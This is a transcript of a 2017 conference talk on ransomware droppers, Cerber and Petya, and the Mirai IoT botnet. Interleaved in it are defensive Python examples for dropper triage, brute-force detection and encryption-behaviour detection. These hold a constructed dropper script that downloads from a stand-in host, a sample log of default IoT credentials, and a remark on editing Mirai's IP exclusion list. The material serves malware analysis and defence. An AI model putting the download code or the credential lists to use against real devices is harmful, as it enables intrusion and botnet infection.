
Demystifying Ransomware and IoT Threats

BSides Amsterdam · 2017 · 34:48 · 127 views · Published 2017-09
About this talk
Christopher Elisan walks through the full lifecycle of modern ransomware attacks—from initial delivery via phishing to encryption and decryption mechanics—using real-world case studies like Petya and CryptoLocker. He then explores how IoT botnets like Mirai are weaponized for DDoS attacks and examines the convergence of ransomware and IoT as a compounding threat. The talk emphasizes practical analysis techniques for malware researchers and actionable defenses for end users.
Original YouTube description
We have seen a rise in ransomware attacks in the past year. While we were recovering from these attacks, a new wave of DDoS attacks using IoT devices was suddenly thrust into the limelight. In this talk, I will discuss all the stages of a ransomware attack: how it works and how a researcher can handle each of the stages with tried and true analysis techniques. I will then shed light on how IoT devices are used in DDoS attacks by discussing how the malware used in the latest IoT DDoS attack works and how it can be manipulated for future attacks. Then I will discuss how a combination of ransomware and IoT attacks can be a bigger threat in years to come. Christopher Elisan is a seasoned reverse engineer and malware researcher. He is currently the Principal Malware Scientist at RSA. He has a long history of digital threat and malware expertise, reversing, research and product development. He started his career at Trend Micro as one of the pioneers of TrendLabs; this is where he honed his skills in malware reversing. After Trend Micro, he built and established F-Secure's Asia R&D, where he spearheaded multiple projects including vulnerability discovery, web security and mobile security. After F-Secure, he joined Damballa as their resident malware SME and reverse engineer. Aside from speaking at various conferences around the world, he frequently provides expert opinion about malware, botnets and APTs for leading industry and mainstream publications. Christopher Elisan is also a published author. He authored "Advanced Malware Analysis" and "Malware, Rootkits and Botnets" and co-authored "Hacking Exposed: Malware and Rootkits." All books are published by McGraw-Hill.
Transcript [en]

Thank you for attending my talk. This is going to be a two-hour talk, so thank you for giving me extra time. So 75% of the talk would be about ransomware and IoT, 25% would be all about me. So this was me when I started in the industry: I had long hair, now it's gone. So currently I'm with RSA, I'm the resident Principal Malware Scientist, and before that I was with Trend Micro, F-Secure and Damballa, which is a company founded by Georgia Tech in Atlanta. And you can follow me on Twitter, and I'm also an author of two books, "Malware, Rootkits and Botnets" and "Advanced Malware Analysis". A third book, "Advanced Reverse Engineering", hopefully will come in the next couple

of years, and I'm also a co-author of the second edition of "Hacking Exposed: Malware and Rootkits". If you buy those books, all proceeds go to my two kids' 529 college fund, so please buy them. All right, so one thing I learned every time I present is that if you tell it as a story, people won't fall asleep, and I've had people fall asleep on my presentation, so hopefully nobody will fall asleep today. So one day a guy named Sam got an email at work. By the way, I'll go fast, so please reserve your questions for the end. And then this is what he got. So he saw this and he was saying, you

know what, this is very suspicious. Since Sam went through user education training, he was able to say, you know what, I learned this, I'll take a look at this email and see what that attachment is all about. So the attachment is a zip file, but then when you save it and extract it, it actually looks like this. So it's not what the email was saying, but since Sam was trained he was able to recognize this, and he said, oh, it's an HTA file. And according to the all-knowing Wikipedia, an HTA file is an HTML executable file introduced in 1999 (I was born in 1999), same with Internet Explorer 5, executed by mshta.exe. And so he was saying,

you know what, I can take care of this, I can look at this, I don't need to involve any of our security team. So what he did, he was looking through the code. So what I'm about to explain here sometimes works on HTA files, sometimes it doesn't, so I learned this through trial and error. So I'm going to go through it in a couple of minutes, but you should... even I did this with trial and error, it took me like a couple of days. So what I usually do when it... or not me, Sam, what Sam did was, he went through the code, and usually you would go to the end

and then you'll see some variable declarations, and then you just choose one. So here you see this, I highlighted it, and you could see here "xkey". So for me, or for Sam, it means it's probably an XOR key, so you keep that for now. And then you look some more: if you look at an if statement or any conditional statement, just get the first variable that's there, search for it, and you'll end up with a function call. And usually in that function call, look for the variable in it; usually it's at the end, sometimes it's just this variable, sometimes there's a plus another variable or plus a character. Copy that, look for it again, and then we

see it at the end, and then what you do with that variable is you alert on it. So you add this line of code after the function, and when you run the HTA file you will see something like this: it will show you the domain where it's downloading all of the malware or ransomware or whatever bad things it wants to download onto your system. So the good thing about this is that you're not running it, you're not downloading the malware, it's just displaying where it comes from, which is fairly safe. So like for me, in my humble opinion, it's safe to run this in the production network, but of course don't run it in the production network,

still run it in your own isolated network. So for that specific example, these were the URLs that were revealed. So you don't need to actually run the malware in a sandbox or run it anywhere on your test machine; you just get this file here, and then you'll get the malware sample, and then you'll be able to analyze it. So that's easier said than done, right? Because once you get the malware sample directly from those domains, it's going to be encrypted. So they designed it that way, so that if somebody tries to scrape malware samples from the Internet, it would be hard for you to analyze it because it would be encrypted. That's where the XOR

key comes from. So it's just XORed with that XOR key that I showed in the HTA, and then you'll have the executable and then you can analyze it. They did it that way to avoid any scraping from researchers, so that if ever those samples get scraped, it will be hard for them to analyze it. So what happens on the host: it downloads the file to the temp folder, it's encrypted. So if you don't have the XOR key, you need to download it, you need to let it work so that you'll be able to get the malware sample. But what usually happens is that once it downloads it to the temp folder, it's encrypted; it writes

it to a DLL or EXE file and decrypts it using that key, which is converted into 32-byte hexadecimal. So if you visit my blog on RSA's website, you'll see there how malware and ransomware use the temp folder. So what it does: it downloads the encrypted file there, it uses the key from the HTA file, and then writes it to a DLL or an EXE file, injects it or just copies itself to a different folder where it gets executed every time the system is rebooted, or after the installation, control is passed to that malware and now it's active in your system. All right, so Sam was so happy, he said, you

know what, I was able to solve it, I don't even need to involve our security team, my training worked, I can ask my employer for another six thousand dollars worth of training at SANS, because I just proved to them that I was able to solve this problem. But of course, like every millennial like us, it didn't happen unless you post it on Facebook, right? So the next thing he did is he wanted to post it on Facebook, but then when he logged on to his Facebook page he saw this message. So one of his friends sent him a message; it's not actually a message but it's an SVG file. So he clicked on the picture

and this is what he saw: it went to a YouTube site. You'll definitely know it's fake; I'm sorry the picture's not as clear, but the URL is not youtube.com, so you know already it's fake, and it's downloading an extension. So he was saying, I know this, I've gone through training, I know how to solve this. And he looked at the details of that extension, and as you will see, it's something that's really not trustworthy. The attackers didn't even spend enough time to make it as believable as they can. So most of us here in the room would say, you know what, yeah, everybody knows that this is easy to spot, but for non-technical users like our aunts,

grandmas, moms, dads, some of them still get fooled like this. How many of you got a text message from your relatives saying, hey, you know what, I think I can pay for our vacation next summer because I just met this Nigerian prince and he said I just need to give him this money and then he'll give me this amount of money? So he was saying, you know what, I need to examine this SVG file. So what is an SVG file? According to Wikipedia, it's a Scalable Vector Graphics file, it's XML-based, and it was introduced in '99, again the year I was born. And the thing about it, when you open that SVG file, it's actually a red dot. So that tells me,

and I'm just guessing here, I'm not so sure if that's what the attackers really wanted to convey, it's like a target. So if you see a red dot, it's usually a bull's eye, it's usually a target. So it's just like saying, you know what, you got this picture, now you're marked. And when you look at it, it has a script in it, and using the same methodology that we used on the HTA file, you look at the end, you look at the function and you look at the variable. Like for this one, I just tried alerting on the different variables here until I found one that actually would display this. So it's an SVG file that points you here,

which is actually the fake YouTube website that downloads the extension for you. So again he was so happy and he said, you know what, I'm really an expert, I was able to solve two targets that were headed my way, so I think I am the man. And that's it, hope you guys learned something today. But nobody's clapping, so... but wait, there's more! I think I still have a few more minutes, so let's discuss some more. By the way, RIP to this guy, one of the greatest sellers on TV. So he got a snail mail from Grandma. Of course everybody loves Grandma, right? If your mom says no to you, you just go to your grandma and your grandma will say yes,

like I remember when I was younger, oh, there's this new Nintendo Entertainment System, and my grandma doesn't know what it is, I just told her, yeah, just give me 60 bucks and then you'll know what it is. So usually grandmas will just say yes to everything. So usually he doesn't get anything from Grandma, but this time he got a mail, and this grandma actually needs help with something. So he said, you know what, my grandma's been kind to me when I was a little kid, I'll go save Grandma. So he went to Grandma's house and then he saw this on Grandma's computer. So everybody knows this is Cerber. By the way, when I

made this presentation, Cerber was the talk of the town, you cannot go anywhere without anybody asking you about Cerber. So when you got infected by ransomware, this is funny, because some people would say, I need you to detect ransomware on my system, and I usually tell them, you'll know when you have ransomware, because it will announce itself: it will play a narration saying you've been victimized and you have to pay this amount of money. So once it's in your system, usually it's already too late. So this is what he got, and since he has some experience with HTA files, Sam was taking this with a grain of salt,

but still he was reading all of the instructions here, and one thing he noticed is that when you look at this, it's actually really very helpful: it will help you pay for the ransomware. And of course everybody heard what Petya is, right? So Petya changed the game of ransomware, because before Petya, big companies would actually pay for something so that they could get their data back, but then they realized, when Petya came, they just got played: they paid for something, they didn't get anything back, because Petya was clearly a wiper, so it destroys your system completely. So he was looking at the README.hta, and it says here, you know what, if this address doesn't work, you can always

refresh this address right here. So let's say you're still thinking two days, three days from now, you're still thinking, you know what, okay, I'll pay for this because these files are important, and then you find out that this link doesn't work anymore; if you just refresh it, then it'll give you a new link. And usually it says here that the HTA file and the encrypted files are not viruses, so the HTA file is saying it's not malware. But of course, if it's coming from a threat actor, you always take it with a grain of salt, right? So if you're not sure what it is, be careful all the time.

So the good thing about Cerber is that it has a decryptor, and again we played around with this. Their customer service is actually way, way better than real customer service. How many of you talk to your phone provider or cable provider, where you have to wait a long period of time on the phone, 45 minutes to an hour, send them an email, wait a week or so, and you don't get a response? But Cerber, they're really very responsive, because they want you to pay; like, you are their customers, so they want to make you happy. And then they're also very security conscious, so you have to prove you're human when you're contacting them or want to talk to them. And then

they offer you like a discounted rate: it's available in the next four days, twenty-three hours. And this is what I was talking about, the tech support, if you have problems. And the good thing about Cerber is that it gives you the opportunity to try before you buy. Like, it's a very proven thing when you want to sell a product; like in the US they would say, you know what, you can buy this, and if in thirty days you're not happy you can return it. Some stores actually offer a year, some stores even offer a lifetime. But of course for them, they just say, you know what, we'll give you the opportunity to decipher one file. So the

good thing about it is that when it comes to Grandma's computer, she really doesn't have any files on her computer, she only has one picture file, because most of her pictures are either in albums or on the walls or on top of the mantel of a fireplace. How many of you, when you go to Grandma's house, it's like a museum, right? You open the door, like tons of pictures there, pictures of your aunts, your parents when they were young, and then you go upstairs, there's pictures lining the wall going up the stairs. So all of the pictures are there. So Sam was saying, Grandma, it's good, because you only have one picture, we don't need to pay for

anything, we could just use their sample decryption to decrypt your picture, then you don't need to pay for anything. So when it comes to decrypting it, you just upload it and then after a few seconds, a couple of minutes, you can download the decrypted file. It's a zip file, and then you open it. So this is what the decrypted picture file looks like. Now this is my test JPEG file; as you can see, I just put everything like "aaaa" there. Sorry, this is the encrypted file, and this version of Cerber only decrypts from the 648 position down, so it only decrypts that part, and I know when it gets decrypted it has to go back to "aaaaa" all the

time. So the decrypted file looks like this. So the thing about not only Cerber but other ransomware: when they decrypt files, they're actually putting it back to its real previous state, everything to the last bit, even the date created, date accessed, date opened; it puts it back to how it was before. It's better than an insurance company, right? So when you have an insurance company, they will say, oh, when you get damaged we'll put it back to how it was before, but actually they won't be able to do that. But ransomware, they're able to do that, they'll actually return it back to the previous state it was in, so you won't even know that

something happened. So if you're a traveling executive, you got victimized by ransomware and you decided to pay for it, your boss wouldn't know that you got victimized by ransomware because everything would be back to normal. So he was saying, Grandma, I'm just curious, what's that one picture you don't want us to see, and you're not even printing it, it's just on your desktop? And this is the picture of Grandma and Grandpa; by the way, they're not my grandparents, they're my neighbor's grandparents, so I had to cover their faces. So, words of advice. So for us this is common sense, but given my experience with other clients and with people that are not really that

technical but have access to things that will enable malware to move laterally in their organization, this is still helpful for them: so don't just click on anything; if it's too good to be true, chances are it's not; and back up regularly. So most user education usually starts with this. So for us it's already common sense, but unfortunately for most people that get victimized it's not really common for them. So Sam was happy and he said, you know what, it's late, I need to go home, my girlfriend's waiting for me, she's a night-shift nurse, so she's probably waiting in my apartment. So he got home and he said, you know what, I just want to relax and chill. So I'm not

so sure if in Amsterdam "Netflix and chill" is a thing; I don't know what it is, I just heard it yesterday. And then I said, you know what, let's just Netflix and chill, let's put on the first episode of season 1 of Game of Thrones where we see Khaleesi expose herself. But then he said, you know what, nothing is working. It's like, I wanted to relax with my girlfriend, I'm tired from helping Grandma and solving two malware problems, and nothing's working. So he tried other services, he tried SoundCloud, Spotify, Twitter, PayPal, and nothing was working, everything was unreachable. And then as the day unfolded, Sam found out that because of the outage

there was a botnet going around called Mirai. It's a DDoS botnet, and the signals or the packets are not coming from your regular desktop or PC or systems, it's coming from devices. So what is Mirai? So it's a malware that infects IoT devices for the purpose of using them in DDoS attacks. So it spreads by scanning IP addresses to find vulnerable IoT devices, and when it comes to scanning IP addresses, it excludes IP ranges of General Electric, HP, the US Postal Service, the Department of Defense and IANA. I would understand they would skip DoD, but I'm not so sure why they would skip the other companies here. I'm not so sure what that is, but it's interesting. And it

also uses a remote C&C to determine its DDoS target, so you could actually change the target based on the command it gets from its C&C channel. And when you look at the code, this is the IP address exception list. So if you want to modify it, if you're playing around with it, you don't want your company to catch you, just put your company IP range there and then it would skip it. So how does the attack work? So once it finds vulnerable IoT devices, it brute forces its way into accessing them via a list of common passwords, and then once it infects an IoT

device, it makes sure that nobody can communicate with it by closing the SSH, Telnet and HTTP ports. It also looks for and removes another IoT malware by the name of Anime. So the good thing about analyzing malware is that if it's a malware that is competing with another malware, chances are it would have the code on how to remove that malware, which saves us time, because you don't need to reverse that other malware, you just need to get the code from the competing malware, try it out, and if it works, it works. Similar to during the SpyEye and Zeus war in the olden times. So this is the list of common passwords. So I have all

of this because the Mirai source code is already public. So the good thing about source code being public is that I don't need to reverse it, just read the code. But then of course it's a double-edged sword: if it's available there, somebody can improve it and release a better version of it for their own purposes. So this one, it's Anna-senpai, the one that's claiming that she's the author. So senpai is the Japanese word for upperclassman; usually before sensei you become a senpai, and then when you're already an expert and you're able to teach other pupils, then you become a sensei. So I'm not so sure if there's another sensei on top of

her, but for now this is what they're claiming. So since the source code was public, somebody took that code and attacked Dyn. So Dyn is an internet infrastructure company in New Hampshire, and the first wave started at 7:00 a.m. Eastern, so that's 7:00 a.m. in New York and in Atlanta; the second wave around noon; the third wave started around p.m. So they were trying to do Netflix and chill in the morning, that's why they were not able to access any of the services they wanted to access. So all of the traffic to Dyn's internet directory servers caused it to stop. So the DDoS there was from millions of IP addresses, or from millions of IP devices. So if you have a camera at home, usually

when you look at it, it says... some cameras have a default broadcast. Like for me, I have cameras at home, it has default broadcast, I make sure I turn it off, because anybody that knows the IP address of my camera can see what my camera sees, and I usually put my camera in our guest bathroom. So, Mirai, what happened: September 20, 2016, Krebs' website was DDoSed; the Mirai source code was released; Dyn was DDoSed; and then after Dyn was DDoSed, Oracle bought Dyn, so it's a good business practice. And then Krebs identified the alleged Mirai author, but of course in our world any digital evidence can be faked, so even the source country can be faked,

everything can be faked. So for you to not be a victim of Mirai (by the way, a new wave of Mirai just came out, I think like a week ago or a few days ago, I haven't really looked into it yet, but it's still around): change the default username and password; disable unnecessary remote access to the IoT device; if you just want your phone or your desktop to access it, make sure it's the only device that can access your IoT device. And the US-CERT advisory, I have it here, it's long, I won't read it; once you have a copy of the slides you can just go through it. So here it's a mouthful, it's

long, you have to memorize it. And then Sam realized, you know what, I haven't been doing this, just give me a couple of minutes and I'll make sure I put those practices into use. And then this is what he saw. So this might be the future: you might have an IoT device that's victimized by ransomware, and it says, you know what, I won't turn on your heater unless you pay me this amount of money, or, oh, I have pictures of you in compromising positions from your camera and I will sell these if you don't pay me this amount of money. So Sam was saying, this is going to be a very long day. The end. Oh, by the way,
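The HTA triage described in the talk (find the key-looking string, find the encoded blob, alert on the decoded value instead of running the dropper, then unwrap the XOR-encrypted download with the same key), as an added example that is not code from the talk or its slides. The dropper text is constructed inline by `build_constructed_dropper`; the variable names `xkey` and `qv`, the URL, the `dx` decode loop, and the assumption that the downloaded payload is wrapped with the same key string are all illustrative assumptions, not details of any real sample.

```python
"""Static triage of an HTA-style dropper, in the spirit of the talk's
"alert on the variable instead of running it" method. All sample data is
constructed here; nothing is fetched or executed."""
import re
from typing import Dict, List, Optional


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR: one call both wraps and unwraps."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_constructed_dropper(url: str, key: str) -> str:
    """Produce a script in the shape the talk describes (constructed sample,
    not a real HTA): a decode loop, a short key and a hex blob that the
    loop XORs back into the download URL."""
    blob = xor_bytes(url.encode(), key.encode()).hex()
    return f'''
<script language="javascript">
function dx(s, k) {{ var o = ""; for (var i = 0; i < s.length; i += 2) {{
  o += String.fromCharCode(parseInt(s.substr(i, 2), 16) ^ k.charCodeAt((i / 2) % k.length)); }} return o; }}
var xkey = "{key}";
var qv = "{blob}";
if (qv.length > 0) {{ var x = new ActiveXObject("MSXML2.XMLHTTP"); x.open("GET", dx(qv, xkey), false); x.send(); }}
</script>
'''


ASSIGN_RE = re.compile(r'var\s+(\w+)\s*=\s*"([^"]*)"')
HEX_RE = re.compile(r'[0-9a-fA-F]+')


def extract_string_vars(script: str) -> Dict[str, str]:
    """Every `var name = "literal"` in the script, collected without running it."""
    return dict(ASSIGN_RE.findall(script))


def recover_urls(script: str) -> List[str]:
    """Key candidates: string literals that are not pure hex.
    Blob candidates: long, even-length, all-hex literals.
    Try every key against every blob and keep decodes that look like URLs.
    (A key made only of hex digits would be misclassified as a blob; widen
    the key set if nothing decodes.)"""
    literals = list(extract_string_vars(script).values())
    keys = [v for v in literals if v and not HEX_RE.fullmatch(v)]
    blobs = [v for v in literals if len(v) >= 16 and len(v) % 2 == 0 and HEX_RE.fullmatch(v)]
    found = []
    for blob in blobs:
        for key in keys:
            try:
                decoded = xor_bytes(bytes.fromhex(blob), key.encode()).decode("ascii")
            except UnicodeDecodeError:
                continue  # wrong key: result is not printable text
            if re.match(r"https?://", decoded):
                found.append(decoded)
    return found


def unpack_payload(blob: bytes, key: str) -> Optional[bytes]:
    """Apply the recovered key to a downloaded blob; accept the result only if
    it starts with the MZ header of a Windows executable. Anything else means
    the key or the wrapping scheme differs and is not worth looking at."""
    out = xor_bytes(blob, key.encode())
    return out if out[:2] == b"MZ" else None


if __name__ == "__main__":
    script = build_constructed_dropper("http://payload.example.invalid/x.bin", "s3cr3t")
    print("download URLs:", recover_urls(script))
    fake_pe = b"MZ" + b"\x90" * 64          # constructed stand-in for a PE file
    wrapped = xor_bytes(fake_pe, b"s3cr3t")  # what the dropper would have fetched
    print("unpacked header:", unpack_payload(wrapped, "s3cr3t")[:2])
```

The script only reads string literals out of the dropper, so the URL comes out without evaluating any of its code and without a network request; the talk's advice about running anything from a sample only on an isolated network still applies to the download step that follows.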
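Two defender-side checks for the Mirai behaviour the talk describes, as an added example (not code from the talk and not from the Mirai source): the first flags a source that walks through many different default-credential pairs against a Telnet service within a short window, and the second compares two port snapshots of your own devices to spot one whose SSH, Telnet and HTTP ports all closed at once, which is what the talk says the malware does once it is in. The log format, credentials, IP addresses and device names are constructed for the example.

```python
"""Signals for the two Mirai behaviours named in the talk: credential-list
brute force over Telnet, and the post-infection closing of SSH/Telnet/HTTP.
Log lines and port snapshots below are constructed, not captured."""
import re
from collections import defaultdict
from datetime import datetime, timezone
from typing import Dict, List, Set, Tuple

LINE_RE = re.compile(
    r'^(?P<ts>\S+) telnetd\[\d+\]: login from (?P<src>[\d.]+) '
    r'user=(?P<user>\S+) pass=(?P<pw>\S*) result=(?P<res>OK|FAIL)$')

# Constructed honeypot-style log: one source walks a credential list in
# seconds and gets in, one admin fat-fingers a password once, one source
# fails twice and gives up. Credentials are generic sample values.
SAMPLE_LOG = """\
2016-10-21T11:05:01Z telnetd[311]: login from 198.51.100.7 user=root pass=admin result=FAIL
2016-10-21T11:05:02Z telnetd[311]: login from 198.51.100.7 user=root pass=12345 result=FAIL
2016-10-21T11:05:02Z telnetd[311]: login from 198.51.100.7 user=admin pass=admin result=FAIL
2016-10-21T11:05:03Z telnetd[311]: login from 198.51.100.7 user=root pass=default result=FAIL
2016-10-21T11:05:04Z telnetd[311]: login from 198.51.100.7 user=support pass=support result=FAIL
2016-10-21T11:05:04Z telnetd[311]: login from 198.51.100.7 user=root pass=password result=OK
2016-10-21T11:09:10Z telnetd[311]: login from 192.0.2.25 user=admin pass=ovWkq2 result=FAIL
2016-10-21T11:09:20Z telnetd[311]: login from 192.0.2.25 user=admin pass=ovWkq9 result=OK
2016-10-21T11:12:00Z telnetd[311]: login from 203.0.113.9 user=root pass=toor result=FAIL
2016-10-21T11:12:30Z telnetd[311]: login from 203.0.113.9 user=root pass=root result=FAIL
"""

Event = Tuple[datetime, str, str, str, str]  # (timestamp, src, user, password, result)


def parse_log(text: str) -> List[Event]:
    """Parse lines of the constructed format; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append((ts, m["src"], m["user"], m["pw"], m["res"]))
    return events


def flag_scanners(text: str, min_distinct: int = 4, window_s: int = 60) -> Dict[str, int]:
    """Sources that tried at least min_distinct different user/password pairs
    within window_s seconds. A human retrying one password does not qualify;
    a worm walking a built-in credential list does."""
    by_src = defaultdict(list)
    for ts, src, user, pw, _ in parse_log(text):
        by_src[src].append((ts, (user, pw)))
    flagged = {}
    for src, evs in by_src.items():
        evs.sort()
        for i in range(len(evs)):
            start = evs[i][0]
            seen = {cred for ts, cred in evs[i:] if (ts - start).total_seconds() <= window_s}
            if len(seen) >= min_distinct:
                flagged[src] = len(seen)
                break
    return flagged


def successful_logins_from_scanners(text: str, **kw) -> Set[Tuple[str, str, str]]:
    """(src, user, password) for every OK login by a flagged source: the device
    credential that worked and therefore needs changing."""
    scanners = flag_scanners(text, **kw)
    return {(src, user, pw) for _, src, user, pw, res in parse_log(text)
            if src in scanners and res == "OK"}


def ports_that_closed(before: Dict[str, Set[int]], after: Dict[str, Set[int]],
                      watched: Tuple[int, ...] = (22, 23, 80)) -> List[str]:
    """Compare two port-scan snapshots {device: open ports} of your own IoT
    devices. A device where every watched port that was open is now closed
    matches the lockdown the talk describes (the worm shutting the doors behind it)."""
    suspects = []
    for dev, was_open in before.items():
        now_open = after.get(dev, set())
        had = {p for p in watched if p in was_open}
        if had and not (had & now_open):
            suspects.append(dev)
    return suspects


if __name__ == "__main__":
    print("scanners:", flag_scanners(SAMPLE_LOG))
    print("credentials that worked:", successful_logins_from_scanners(SAMPLE_LOG))
    before = {"cam-1": {23, 80}, "cam-2": {23, 80}, "nas": {22, 80, 443}}
    after = {"cam-1": set(), "cam-2": {23, 80}, "nas": {443}}
    print("devices that went dark on 22/23/80:", ports_that_closed(before, after))
```

The port comparison also fires for a device that simply lost power, so in practice it is paired with a reachability check (ping, or a management port the device still answers on) before anyone drives out to look at a camera.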

any questions, violent reactions? Yes sir.

So you were talking about the ransomware and that they have this great customer service and that they do everything to get your money, they help you out a lot; so what changed with that?

Yeah, so with Petya, the thing about Petya is it's really not ransomware; I term it as a wiper, because what it did at first, it shows a message that you need to pay this or so, and that your files have been encrypted, but then when you look at the code itself, there's no decryption capability. What it does, it actually messes up your Master Boot Record, so once you get infected by it, if you don't have a

backup of it, then you won't get your files back. And actually, this is from the chatter from the underground, it happily messed up the other ransomware operators and it made them mad, because now the customers are losing trust in them, because they're saying, hey, we have this really nice business model and Petya came and messed it all up, now how will the public trust us? So that's what they're saying. Any other questions? Yeah.

Thanks for your talk. I was wondering, you have been working for several antivirus companies, and I'm by no means a malware expert, but I was wondering why have we as an antivirus industry still not solved the issue of, well, cryptolockers? Like we

have a lot of behavioral and heuristic detection mechanisms these days; how come major antivirus systems like, for example, McAfee Antivirus Security still have not been able to, well, detect most of these cryptographic operations and read/write instructions and those kinds of things in malware?

So it's not only cryptographic malware, it's basically malware in general. So I had a presentation before, I call it The Malware Factory, wherein I showed live how easy it is to create a new generation of malware. And the thing about it, usually host-based systems would rely on host behavior: they would monitor the environment, and if there are changes they would use that as a signature, and the static signature of the malware file

itself. And the thing about it is that if you rely on signatures, you can just change one thing and then it would totally be different. So in my presentation, The Malware Factory, I proved there that I just change one thing and it's a totally new malware again, and we call it the green malware, made of 100% recycled malware. So it's the same thing no matter what, even if it's a cryptolocker or whatever: they just change something there, they deploy it and it becomes new again. So right now there's a movement where most host security systems are using machine learning, but of course we're still far off from achieving that. There was a case,

I won't say the name of the company, wherein a researcher uploaded HelloWorld to VirusTotal and some machine learning algorithm of a host-based system detected it as malware. So right now, when it comes to detecting malware, there's so many things you have to insert your product in, which is why the presentation about the kill chain earlier is very helpful, because once it's already in the host, it means that your network defenses have already failed, and if it's able to install itself on the host, then your endpoint system has failed. So unless we find a new way of detecting malware that's not signature-based, with better AI or a better machine learning algorithm, malware will

still thrive, which means job security for all of us. I hope that answered your question.

Yeah, partly.

By the way, when I started in the industry, we were only getting like 13 bytes from the malware code, and before it was enough because it was just DOS malware, but then when Windows malware became a reality everything changed.

A very quick one. You talked about the grandmothers that are looking at ransomware and don't know what to do, and you get all these people that don't know how to use their computer; this is what they say at the end of the day: they know how to go out, buy Bitcoin and pay for the

ransomware? So I don't see how this thing relates. I mean, yeah, that's right, they can't... the malware authors expect them to go out, buy bitcoins and pay them, and these people don't know how to open Facebook if it's down, or if they're logged out, for example. So I cannot see... this is a little bit of a philosophical question, but I think, yeah, something's there.

That's a very good question. So when it comes to ransomware, most of their targets are the big companies that have like multi-million dollar IP on their systems, and they have the capability to buy bitcoins. Before, there was a wave of, I would say, fake

ransomware scares; we actually had a presentation about it, I call it "All Your Macs Are Belong to Us", wherein their targets are really like the non-technical users. They make it very easy for you, because they would even have instructions there: just go to Walmart, buy this card, input your 16-digit card number here, or you can use your credit card to pay for it, which is easier for most of our non-technical relatives. So it's easier to go to Walmart, or go to Western Union or MoneyGram and send money, or buy those prepaid cards. And like right now, there's an IRS scam that's been going around again; it's an old scam, but it's

funny because they would ask you, how about you just pay me in iTunes cards, or how about you just pay me in Google Play cards? And yep, yep, yeah, which is, like, most... unless you've been exposed to this, you wouldn't even know what a Bitcoin is. Thank you guys, thank you. [Applause]
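A behaviour-based rule of the kind the cryptolocker question and its answer are about, as an added example that is not from the talk: it ignores what the binary is called or hashes to and instead flags a process that rewrites many files with near-random content in a short window, scoring each write by the Shannon entropy of the bytes written. The file-write events are constructed inline, the process names and paths are made up, and the entropy and rate thresholds are assumptions to be tuned per environment.

```python
"""Host-behaviour heuristic for bulk encryption: many high-entropy rewrites
by one process in a short window. Events are constructed for the example."""
import math
from collections import Counter, defaultdict
from typing import Dict, Iterable, List, Tuple

Event = Tuple[float, str, str, bytes]  # (seconds, process, path, bytes written)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 for empty input; 8.0 means every byte value is equally likely,
    which is what ciphertext (or compressed data) looks like."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def flag_mass_encryption(events: Iterable[Event], window_s: float = 30.0,
                         min_files: int = 5, min_entropy: float = 7.0) -> Dict[str, int]:
    """Return {process: distinct files} for processes that rewrote at least
    min_files different files with entropy >= min_entropy inside window_s seconds.
    The rule never looks at the process's image, only at what it did."""
    per_proc = defaultdict(list)
    for ts, proc, path, data in events:
        if shannon_entropy(data) >= min_entropy:
            per_proc[proc].append((ts, path))
    flagged = {}
    for proc, writes in per_proc.items():
        writes.sort()
        for i in range(len(writes)):
            start = writes[i][0]
            paths = {p for ts, p in writes[i:] if ts - start <= window_s}
            if len(paths) >= min_files:
                flagged[proc] = len(paths)
                break
    return flagged


# Constructed payload samples: HIGH is a permutation of all 256 byte values
# (entropy exactly 8.0, stands in for ciphertext); LOW is repetitive text.
HIGH = bytes((i * 73 + 41) % 256 for i in range(256))
LOW = b"int main(void) { return 0; }\n" * 8


def constructed_events() -> List[Event]:
    """Three actors: a bulk encryptor, a compiler writing plain text fast,
    and a backup tool writing one large compressed archive."""
    ev: List[Event] = []
    for k in range(8):  # eight documents rewritten as ciphertext in eight seconds
        ev.append((100.0 + k, "svchost_update.exe", f"C:/Users/sam/Documents/doc{k}.docx", HIGH))
    for k in range(8):  # same rate, but low-entropy output: should not fire
        ev.append((100.0 + k, "cl.exe", f"C:/build/obj{k}.c", LOW))
    ev.append((200.0, "backup.exe", "D:/backups/2016-10-21.7z", HIGH))  # one file: should not fire
    return ev


if __name__ == "__main__":
    print("flagged:", flag_mass_encryption(constructed_events()))
    renamed = [(ts, "totally_new_name.exe" if p == "svchost_update.exe" else p, path, d)
               for ts, p, path, d in constructed_events()]
    print("same behaviour under a new name:", flag_mass_encryption(renamed))
```

Renaming or repacking the binary, the "green malware" point from the answer, changes nothing here because the rule keys on the writes, not the image. The trade-off is on the other side: the rule says nothing about a process that stays under the rate threshold, and an archiver legitimately emits high-entropy output at speed, so in practice this is one signal correlated with others (file-type versus extension mismatches, canary files, the ransom note itself appearing) rather than a verdict on its own.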